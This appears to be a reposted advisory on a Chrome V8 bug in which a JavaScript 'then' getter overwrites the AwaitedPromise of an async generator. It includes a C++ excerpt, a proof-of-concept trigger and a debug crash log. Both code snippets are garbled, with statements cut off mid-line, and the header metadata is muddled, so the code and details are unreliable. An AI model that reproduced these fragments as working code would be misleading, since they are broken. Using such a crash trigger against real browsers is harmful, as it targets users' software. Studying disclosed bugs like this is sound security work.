Chrome V8 JIT – ‘AwaitedPromise’ Update Bug

Authors:Google Security Research   Risk:High 

CVE:NO                            0day:Update Bug

0day -id:0DAY-17604                Date:2018-04-26


Chrome V8 is Google’s open source high-performance JavaScript engine, written in C++ and used in Google Chrome, the open source browser from Google, and in Node.js, among others. It implements ECMAScript as specified in ECMA-262, and runs on Windows 7 or later, macOS 10.5+, and Linux systems that use IA-32, ARM, or MIPS processors. V8 can run standalone, or can be embedded into any C++ application. More information can be found on V8’s public wiki.


Here's a snippet of AsyncGeneratorReturn. (
  Node* const context = Parameter(Descriptor::kContext);
  Node* const outer_promise = LoadPromiseFromAsyncGeneratorRequest(req);
  Node* const promise =
      Await(context, generator, value, outer_promise, AwaitContext::kLength,
            init_closure_context, var_on_resolve.value(), var_on_reject.value(),
  CSA_SLOW_ASSERT(this, IsGeneratorNotSuspendedForAwait(generator));
  StoreObjectField(generator, JSAsyncGeneratorObject::kAwaitedPromiseOffset,
The Await methods calls ResolveNativePromise which calls InternalResolvePromise which can invoke user JavaScript code through a "then" getter. If the AwaitedPromise is replaced by the user script, the AwaitedPromise will be immediately overwritten after the call to Await, this may lead the generator to an incorrect state.
async function* asyncGenerator() {
let gen = asyncGenerator();
    get then() {
        delete this.then;
Log in debug mode:
abort: CSA_ASSERT failed: IsNotUndefined(request) [../../src/builtins/]
==== JS stack trace =========================================
Security context: 0x2b29083a3a71 <JSObject>#0#
    2: /* anonymous */(this=0x19b7b0603721 <JSGlobal Object>#1#,0x19b7b060d139 <Object map = 0x189055388c91>#2#)
==== Details ================================================
[2]: /* anonymous */(this=0x19b7b0603721 <JSGlobal Object>#1#,0x19b7b060d139 <Object map = 0x189055388c91>#2#) {
// optimized frame
--------- s o u r c e   c o d e ---------
<No Source>
==== Key         ============================================
 #0# 0x2b29083a3a71: 0x2b29083a3a71 <JSObject>
 #1# 0x19b7b0603721: 0x19b7b0603721 <JSGlobal Object>
 #2# 0x19b7b060d139: 0x19b7b060d139 <Object map = 0x189055388c91>
Received signal 4 ILL_ILLOPN 7fb143ae2781
==== C stack trace ===============================
[end of stack trace]
Illegal instruction

